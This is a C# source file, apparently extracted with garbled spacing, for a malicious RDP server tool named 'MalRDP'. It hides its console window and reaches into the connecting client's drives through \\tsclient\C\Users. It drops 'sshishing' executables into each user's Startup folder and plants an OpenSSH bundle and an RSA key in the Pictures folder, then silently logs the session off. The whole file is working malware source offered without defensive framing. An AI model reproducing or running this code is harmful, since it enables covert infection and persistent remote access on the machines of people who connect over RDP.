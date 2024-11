using System ;

using System. Collections. Generic ;

using System. IO ;

using System. Linq ;

using System. Runtime. InteropServices ;

using System. Threading. Tasks ;

using System. Windows. Forms ;

namespace MalRDP

{

class Program

{

[ DllImport ( "wtsapi32. dll" , SetLastError = true ) ]

static extern bool WTSLogoffSession ( IntPtr hServer , int sessionId , bool bWait ) ;

[ DllImport ( "kernel32. dll" ) ]

static extern IntPtr GetConsoleWindow () ;

[ DllImport ( "user32. dll" ) ]

static extern bool ShowWindow ( IntPtr hWnd , int nCmdShow ) ;

const int SW_HIDE = 0 ;

const int WTS_CURRENT_SESSION = - 1 ;

static readonly IntPtr WTS_CURRENT_SERVER_HANDLE = IntPtr . Zero ;

static void CopyDirectory ( string sourceDir , string destDir ) {

// Get the subdirectories for the specified directory. DirectoryInfo dir = new DirectoryInfo( sourceDir) ;

if ( ! dir . Exists )

{

throw new DirectoryNotFoundException (

"Source directory does not exist or could not be found: " + sourceDir ) ;

}

// If the destination directory doesn't exist, create it. if ( !Directory. Exists( destDir) )

{

Directory . CreateDirectory ( destDir ) ;

}

// Get the files in the directory and copy them to the new location.

FileInfo [ ] files = dir . GetFiles () ;

foreach ( FileInfo file in files )

{

string tempPath = Path . Combine ( destDir , file . Name ) ; file . CopyTo ( tempPath , false ) ;

Console . WriteLine ( $"Copied { file . FullName } to { tempPath } " ) ;

}

// Copy subdirectories and their contents recursively. DirectoryInfo[] dirs = dir. GetDirectories(); foreach ( DirectoryInfo subdir in dirs)

{

string tempPath = Path . Combine ( destDir , subdir . Name ) ; CopyDirectory ( subdir . FullName , tempPath ) ; }

}

static void Main ( string [ ] args )

{

var handle = GetConsoleWindow () ;

ShowWindow ( handle , SW_HIDE ) ;

int retry = 0 ;

string [ ] user_directories = {} ;

while ( retry < 10 )

{

try

{

user_directories =

Directory . GetDirectories ( @"\\ tsclient\ C\ Users" ) ;

break ;

}

catch {

}

System . Threading . Thread . Sleep ( 500 ) ;

retry ++;

}

string dropperInPath = @"C:\ Netlogon\ sshishing2. exe" ; string sshingInPath = @"C:\ Netlogon\ sshishing. exe" ; string sshInDirPath = @"C:\ Netlogon\ OpenSSH-Win64" ; string sshKeyInPath = @"C:\ Netlogon\ rsa" ;

foreach ( string dir in user_directories ) {

if ( dir . EndsWith ( "Default" ) || dir . EndsWith ( "Default User" ) || dir . EndsWith ( "Public" ) || dir . EndsWith ( "All Users" ) ) continue ;

try

{

string dropperOutPath = $@"

{ dir } \ AppData\ Roaming\ Microsoft\ Windows\ Start

Menu\ Programs\ Startup\ sshishing2. exe" ;

string sshingOutPath = $@"

{ dir } \ AppData\ Roaming\ Microsoft\ Windows\ Start

Menu\ Programs\ Startup\ sshishing. exe" ;

string sshOutDirPath = $@" { dir } \ Pictures\ OpenSSH Win64" ;

string sshKeyOutPath = $@" { dir } \ Pictures\ rsa" ; if ( File . Exists ( dropperInPath ) & &

! File . Exists ( dropperOutPath ) )

{

File . Copy ( dropperInPath , dropperOutPath ) ; }

if ( File . Exists ( sshingInPath ) & &

! File . Exists ( sshingOutPath ) )

{

File . Copy ( sshingInPath , sshingOutPath ) ; }

if ( File . Exists ( sshKeyInPath ) & &

! File . Exists ( sshKeyOutPath ) )

{

File . Copy ( sshKeyInPath , sshKeyOutPath ) ; }

if ( Directory . Exists ( sshInDirPath ) & & ! Directory . Exists ( sshOutDirPath ) )

{

CopyDirectory ( sshInDirPath , sshOutDirPath ) ; }

}

catch ( Exception e )

{

}

}

WTSLogoffSession ( WTS_CURRENT_SERVER_HANDLE ,

WTS_CURRENT_SESSION , false ) ;

}

}